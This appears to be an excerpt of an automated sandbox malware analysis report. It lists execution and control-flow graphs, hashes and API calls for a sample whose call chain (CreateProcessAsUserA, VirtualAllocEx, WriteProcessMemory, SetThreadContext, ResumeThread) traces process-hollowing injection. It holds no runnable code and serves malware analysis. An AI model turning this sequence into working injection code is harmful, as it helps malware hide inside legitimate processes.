                                                                                                                                                                                                  execution_graph 13882 3d2a9a8 13883 3d2a9c6 13882->13883 13886 3d2a584 13883->13886 13885 3d2a9fd 13888 3d2c4c8 LoadLibraryA 13886->13888 13889 3d2c5a4 13888->13889 13890 3d20448 13891 3d2044e 13890->13891 13892 3d20452 13891->13892 13895 3d24401 13891->13895 13900 3d243db 13891->13900 13897 3d24409 13895->13897 13896 3d24469 13905 3d26c70 13897->13905 13909 3d26c60 13897->13909 13901 3d243fe 13900->13901 13902 3d243fa 13900->13902 13903 3d26c70 12 API calls 13901->13903 13904 3d26c60 12 API calls 13901->13904 13903->13902 13904->13902 13906 3d26c8f 13905->13906 13907 3d26ca7 13906->13907 13913 3d27b4c 13906->13913 13907->13896 13910 3d26c71 13909->13910 13911 3d26ca7 13910->13911 13912 3d27b4c 12 API calls 13910->13912 13911->13896 13912->13910 13914 3d27b5e 13913->13914 13945 3d28260 13914->13945 13949 3d28255 13914->13949 13915 3d27be0 13923 3d27ed9 13915->13923 13937 3d28750 ReadProcessMemory 13915->13937 13938 3d28748 ReadProcessMemory 13915->13938 13916 3d27f43 13935 3d28a20 ResumeThread 13916->13935 13936 3d28a18 ResumeThread 13916->13936 13917 3d27f6b 13917->13906 13918 3d27cc0 13939 3d28840 VirtualAllocEx 13918->13939 13940 3d28838 VirtualAllocEx 13918->13940 13919 3d27d37 13920 3d27d79 13919->13920 13933 3d28840 VirtualAllocEx 13919->13933 13934 3d28838 VirtualAllocEx 13919->13934 13920->13923 13927 3d288e0 WriteProcessMemory 13920->13927 13928 3d288e8 WriteProcessMemory 13920->13928 13921 3d27da2 13922 3d27e98 13921->13922 13943 3d288e0 WriteProcessMemory 13921->13943 13944 3d288e8 WriteProcessMemory 13921->13944 13925 3d288e0 WriteProcessMemory 13922->13925 13926 3d288e8 WriteProcessMemory 13922->13926 13924 3d27f13 13923->13924 13941 3d28690 SetThreadContext 13923->13941 13942 3d28688 SetThreadContext 13923->13942 13924->13916 13931 3d28690 SetThreadContext 13924->13931 13932 3d28688 SetThreadContext 13924->13932 13925->13923 13926->13923 13927->13921 13928->13921 13931->13916 13932->13916 13933->13920 13934->13920 13935->13917 13936->13917 13937->13918 13938->13918 13939->13919 13940->13919 13941->13924 13942->13924 13943->13921 13944->13921 13947 3d282ed 13945->13947 13946 3d2848c CreateProcessAsUserA 13948 3d28505 13946->13948 13947->13946 13947->13947 13948->13948 13950 3d28260 CreateProcessAsUserA 13949->13950 13952 3d28505 13950->13952 13952->13952

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 03D28260 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 58 3d28260-3d282f9 60 3d282fb-3d28320 58->60 61 3d2834d-3d2836d 58->61 60->61 64 3d28322-3d28324 60->64 65 3d283c1-3d283f2 61->65 66 3d2836f-3d28394 61->66 67 3d28326-3d28330 64->67 68 3d28347-3d2834a 64->68 75 3d283f4-3d2841c 65->75 76 3d28449-3d28503 CreateProcessAsUserA 65->76 66->65 73 3d28396-3d28398 66->73 70 3d28332 67->70 71 3d28334-3d28343 67->71 68->61 70->71 71->71 74 3d28345 71->74 77 3d2839a-3d283a4 73->77 78 3d283bb-3d283be 73->78 74->68 75->76 84 3d2841e-3d28420 75->84 88 3d28505-3d2850b 76->88 89 3d2850c-3d28580 76->89 79 3d283a6 77->79 80 3d283a8-3d283b7 77->80 78->65 79->80 80->80 83 3d283b9 80->83 83->78 86 3d28422-3d2842c 84->86 87 3d28443-3d28446 84->87 90 3d28430-3d2843f 86->90 91 3d2842e 86->91 87->76 88->89 100 3d28582-3d28586 89->100 101 3d28590-3d28594 89->101 90->90 92 3d28441 90->92 91->90 92->87 100->101 102 3d28588 100->102 103 3d28596-3d2859a 101->103 104 3d285a4-3d285a8 101->104 102->101 103->104 105 3d2859c 103->105 106 3d285aa-3d285ae 104->106 107 3d285b8-3d285bc 104->107 105->104 106->107 108 3d285b0 106->108 109 3d285ce-3d285d5 107->109 110 3d285be-3d285c4 107->110 108->107 111 3d285d7-3d285e6 109->111 112 3d285ec 109->112 110->109 111->112 114 3d285ed 112->114 114->114
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 03D284F0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateProcessUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2217836671-0
                                                                                                                                                                                                  • Opcode ID: 38b684cbc7851c91ec15a791593170feefe1876f95e2f17df7dea4945b68719d
                                                                                                                                                                                                  • Instruction ID: 40ab60ee802d7a65eba7dcac98a257d81faec73f19a4376a04628707eab89830
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38b684cbc7851c91ec15a791593170feefe1876f95e2f17df7dea4945b68719d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24A15971E002288FDB10CFA9C945BDDBBB6FF58308F0485A9E818E7290DB749985DF91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03B72DB8 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 191 3b72db8-3b72dd3 192 3b73005-3b7302d 191->192 193 3b72dd9-3b72de0 191->193 207 3b73034-3b7314c 192->207 194 3b72de2-3b72deb 193->194 195 3b72dec-3b72e0b 193->195 196 3b72e11-3b72e32 195->196 197 3b72ff8-3b73004 195->197 199 3b72e34-3b72e38 196->199 200 3b72e3a-3b72e68 196->200 199->200 202 3b72e6a 199->202 204 3b72e6d-3b72ef3 call 3b71ff0 200->204 202->204 262 3b72ef5 call 3b73192 204->262 263 3b72ef5 call 3b72db8 204->263 264 3b72ef5 call 3b72da8 204->264 226 3b73155-3b731a0 207->226 227 3b7314e-3b73154 207->227 219 3b72efb-3b72f09 call 3b72500 224 3b72f0b-3b72f0d 219->224 225 3b72f68-3b72f6c 219->225 230 3b72f51-3b72f60 224->230 228 3b72faf-3b72fb6 225->228 229 3b72f6e-3b72f7b 225->229 253 3b731a2 226->253 254 3b731aa-3b731ae 226->254 227->226 231 3b72fca-3b72fce 228->231 232 3b72fb8-3b72fbf 228->232 234 3b72f8f-3b72fa1 229->234 235 3b72f7d-3b72f82 229->235 230->225 233 3b72f62 230->233 240 3b72ff0-3b72ff5 231->240 241 3b72fd0-3b72fd7 231->241 232->231 237 3b72fc1 232->237 238 3b72f64-3b72f66 233->238 239 3b72f0f-3b72f1b 233->239 234->240 247 3b72fa3-3b72fad 234->247 235->234 243 3b72f84-3b72f8d 235->243 237->231 238->225 238->239 239->207 246 3b72f21-3b72f50 239->246 240->197 241->240 245 3b72fd9-3b72fef 241->245 243->240 246->230 247->240 253->254 256 3b731b0-3b731bc 254->256 257 3b731ca 254->257 258 3b731c4 256->258 259 3b731be-3b731c1 256->259 260 3b731cb 257->260 258->257 259->258 260->260 262->219 263->219 264->219
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314681346.0000000003B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B70000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3b70000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: <wl
                                                                                                                                                                                                  • API String ID: 0-2289938068
                                                                                                                                                                                                  • Opcode ID: 1db7ef61b13aecbe4dbb1f9fc42ad00787b1a45acb397245c052e3199729474c
                                                                                                                                                                                                  • Instruction ID: 50bb965a1dddf9a89ab1ebb7e5c995111ce278e95a5f1f6f37caab3139c40656
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1db7ef61b13aecbe4dbb1f9fc42ad00787b1a45acb397245c052e3199729474c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2D19370E00209CFCB14DFA8C484AAEFBF5FF48318F1585A9E525AB355DB34A946CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D2EB98 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9233b3b52eed75141bc8b1ef1142f7f16f9367e7e74bb5f4b1a735a12c4aa3ab
                                                                                                                                                                                                  • Instruction ID: 4d37e23583f0a17699de73e99b70e82564cee6ac8a998ffeaca77fabef5e6995
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9233b3b52eed75141bc8b1ef1142f7f16f9367e7e74bb5f4b1a735a12c4aa3ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20B16E70E042298FDB10CFA9C8857DDFFF2AF98718F188129E815A7394DB749845CB95
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D2F468 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f78a99b104922d2a90276c64cbe0620becfda20a7527ed4bea11b6ad9d31b5fa
                                                                                                                                                                                                  • Instruction ID: 1225f0063320d634705982968c87ae53eea002f2ffac160c7e76052f1f81fc00
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f78a99b104922d2a90276c64cbe0620becfda20a7527ed4bea11b6ad9d31b5fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07B17E70E002198FDB10CFA8C8857DEBFF6AF98718F188929D815EB354EB749845CB85
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D28255 Relevance: 1.8, APIs: 1, Instructions: 265processCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 3d28255-3d282f9 3 3d282fb-3d28320 0->3 4 3d2834d-3d2836d 0->4 3->4 7 3d28322-3d28324 3->7 8 3d283c1-3d283f2 4->8 9 3d2836f-3d28394 4->9 10 3d28326-3d28330 7->10 11 3d28347-3d2834a 7->11 18 3d283f4-3d2841c 8->18 19 3d28449-3d28503 CreateProcessAsUserA 8->19 9->8 16 3d28396-3d28398 9->16 13 3d28332 10->13 14 3d28334-3d28343 10->14 11->4 13->14 14->14 17 3d28345 14->17 20 3d2839a-3d283a4 16->20 21 3d283bb-3d283be 16->21 17->11 18->19 27 3d2841e-3d28420 18->27 31 3d28505-3d2850b 19->31 32 3d2850c-3d28580 19->32 22 3d283a6 20->22 23 3d283a8-3d283b7 20->23 21->8 22->23 23->23 26 3d283b9 23->26 26->21 29 3d28422-3d2842c 27->29 30 3d28443-3d28446 27->30 33 3d28430-3d2843f 29->33 34 3d2842e 29->34 30->19 31->32 43 3d28582-3d28586 32->43 44 3d28590-3d28594 32->44 33->33 35 3d28441 33->35 34->33 35->30 43->44 45 3d28588 43->45 46 3d28596-3d2859a 44->46 47 3d285a4-3d285a8 44->47 45->44 46->47 48 3d2859c 46->48 49 3d285aa-3d285ae 47->49 50 3d285b8-3d285bc 47->50 48->47 49->50 51 3d285b0 49->51 52 3d285ce-3d285d5 50->52 53 3d285be-3d285c4 50->53 51->50 54 3d285d7-3d285e6 52->54 55 3d285ec 52->55 53->52 54->55 57 3d285ed 55->57 57->57
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 03D284F0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateProcessUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2217836671-0
                                                                                                                                                                                                  • Opcode ID: 9603fe7717509888c44e9eca61406311acb7edbf8144ae8dd930969d200bae23
                                                                                                                                                                                                  • Instruction ID: c4dddf4f45169acbeb063660abc5d5000e7712dc7009700ade9c15f39a6c4fb8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9603fe7717509888c44e9eca61406311acb7edbf8144ae8dd930969d200bae23
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2A15B71E002298FDB10CFA9C945BDDBBB6FF58308F0485A9E818E7290DB749985DF91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D2A584 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 265 3d2a584-3d2c51f 267 3d2c521-3d2c52b 265->267 268 3d2c558-3d2c5a2 LoadLibraryA 265->268 267->268 269 3d2c52d-3d2c52f 267->269 273 3d2c5a4-3d2c5aa 268->273 274 3d2c5ab-3d2c5dc 268->274 271 3d2c552-3d2c555 269->271 272 3d2c531-3d2c53b 269->272 271->268 275 3d2c53f-3d2c54e 272->275 276 3d2c53d 272->276 273->274 280 3d2c5de-3d2c5e2 274->280 281 3d2c5ec 274->281 275->275 277 3d2c550 275->277 276->275 277->271 280->281 282 3d2c5e4 280->282 283 3d2c5ed 281->283 282->281 283->283
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 03D2C592
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                  • Opcode ID: 63406f638af803d6661c8e26af886cbf001c4f2bca8e65dff886d5478c795a10
                                                                                                                                                                                                  • Instruction ID: 1b5eb85dbd39d0eee592394b1997a0b73597d1e4c83c2a1bc6e8dfbba434df18
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63406f638af803d6661c8e26af886cbf001c4f2bca8e65dff886d5478c795a10
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A63144B1D102688FCB10CFA8C88479EBFF1AB18318F14852AE815EB380DB79D845CF95
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D2C4BC Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 284 3d2c4bc-3d2c51f 286 3d2c521-3d2c52b 284->286 287 3d2c558-3d2c5a2 LoadLibraryA 284->287 286->287 288 3d2c52d-3d2c52f 286->288 292 3d2c5a4-3d2c5aa 287->292 293 3d2c5ab-3d2c5dc 287->293 290 3d2c552-3d2c555 288->290 291 3d2c531-3d2c53b 288->291 290->287 294 3d2c53f-3d2c54e 291->294 295 3d2c53d 291->295 292->293 299 3d2c5de-3d2c5e2 293->299 300 3d2c5ec 293->300 294->294 296 3d2c550 294->296 295->294 296->290 299->300 301 3d2c5e4 299->301 302 3d2c5ed 300->302 301->300 302->302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 03D2C592
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                  • Opcode ID: 8b8b69b829a2348512bad74a354e904c2557bed527f717a04b1eb712dbe4a99c
                                                                                                                                                                                                  • Instruction ID: b7c0c16ad2530d5384b572de5e5fc283af6686e9518ffcff67f4ff4aed79e45b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b8b69b829a2348512bad74a354e904c2557bed527f717a04b1eb712dbe4a99c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C3132B1D102698FDB10CFA8C88579EFFF1AF08318F14852AE815A7280DB799845CF95
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D288E0 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 923 3d288e0-3d28939 926 3d2893b-3d28947 923->926 927 3d28949-3d28982 WriteProcessMemory 923->927 926->927 928 3d28984-3d2898a 927->928 929 3d2898b-3d289ac 927->929 928->929
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03D28975
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                  • Opcode ID: a086e13acd942e255a55909649c40492529c59883e2b2dc91cb911634d2d2ea7
                                                                                                                                                                                                  • Instruction ID: 49b386347bfb669570bfbe543bb111d8e60c315d10fcdb151239a1498eed1537
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a086e13acd942e255a55909649c40492529c59883e2b2dc91cb911634d2d2ea7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC2105B19002599FCF10CFAAD984BDEFBF4FB48324F04852AE558A7350D778A544CBA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D288E8 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 931 3d288e8-3d28939 933 3d2893b-3d28947 931->933 934 3d28949-3d28982 WriteProcessMemory 931->934 933->934 935 3d28984-3d2898a 934->935 936 3d2898b-3d289ac 934->936 935->936
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 03D28975
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                  • Opcode ID: 62823a33699d0e086b5f29bcf6c53d100fa155c58af00c906ac4a67dcf32e1fa
                                                                                                                                                                                                  • Instruction ID: 577a0286dc1097efa4c359b86cd2fe833af0e5d53bf625bab4982c651ddaee91
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62823a33699d0e086b5f29bcf6c53d100fa155c58af00c906ac4a67dcf32e1fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E32112B19002599FCB10CF9AC984BDEFBF4FB48324F04842AE958A3250D778A944CBA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D28688 Relevance: 1.6, APIs: 1, Instructions: 60threadinjectionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 938 3d28688-3d286dc 941 3d286e8-3d28714 SetThreadContext 938->941 942 3d286de-3d286e6 938->942 943 3d28716-3d2871c 941->943 944 3d2871d-3d2873e 941->944 942->941 943->944
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 03D28707
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                                                                  • Opcode ID: ced03f5fb6aa8631630cbbf0eadb221dfc4c21ae242067e90fa91d09c1da1437
                                                                                                                                                                                                  • Instruction ID: c071269b8207f03ab2bc0ef8ca503609770b01733f8300855e5c7fd0a560ba7b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ced03f5fb6aa8631630cbbf0eadb221dfc4c21ae242067e90fa91d09c1da1437
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C2127B1D006299FCB00CF9AD5847EEFBB4BB48224F44812AE418B7240D778A9448FA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D28748 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 953 3d28748-3d287d3 ReadProcessMemory 956 3d287d5-3d287db 953->956 957 3d287dc-3d287fd 953->957 956->957
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03D287C6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                  • Opcode ID: 5c136c694db009c012650f6af9f186d7ebd58eb53fcb91c760b652d469dc95e8
                                                                                                                                                                                                  • Instruction ID: 36e02a7a782524011f97a578c6ee1989889a870f394bcad4c0b37dcf66defe47
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c136c694db009c012650f6af9f186d7ebd58eb53fcb91c760b652d469dc95e8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D2124719002599FCB10CF9AC984BDFFBF8FB48324F14842AE958A3250D339A645CFA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D28690 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 946 3d28690-3d286dc 948 3d286e8-3d28714 SetThreadContext 946->948 949 3d286de-3d286e6 946->949 950 3d28716-3d2871c 948->950 951 3d2871d-3d2873e 948->951 949->948 950->951
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 03D28707
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                                                                  • Opcode ID: 945842f1a8e96bdd969cea6706c405a485b4e0f34520dc7aeed632823435dbd1
                                                                                                                                                                                                  • Instruction ID: 1207c73094409c90ebb3d37ef475a4b6b2319916b4706a443593d7be01fe00e5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 945842f1a8e96bdd969cea6706c405a485b4e0f34520dc7aeed632823435dbd1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE2106B1D006299FCB10CF9AC985BEEFBF4BB48624F54812AD418B3640D778A944CFA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03D28750 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 959 3d28750-3d287d3 ReadProcessMemory 961 3d287d5-3d287db 959->961 962 3d287dc-3d287fd 959->962 961->962
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03D287C6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.314739421.0000000003D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3d20000_z5i6tLOUD0.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                  • Opcode ID: 5b6ed0103407c5df7b7ec5737aeed0b05cd7e1cc0d90d8b563110b6219272b4f
                                                                                                                                                                                                  • Instruction ID: 6ee9b763d70510fc25c06fbee912e4d2b7c67c0878aabd3e29f76f1f568be2ca
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b6ed0103407c5df7b7ec5737aeed0b05cd7e1cc0d90d8b563110b6219272b4f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C2106719002599FCB10CF9AC984BDEFBF4FB48324F14842AE558A7250D379A544CFA1
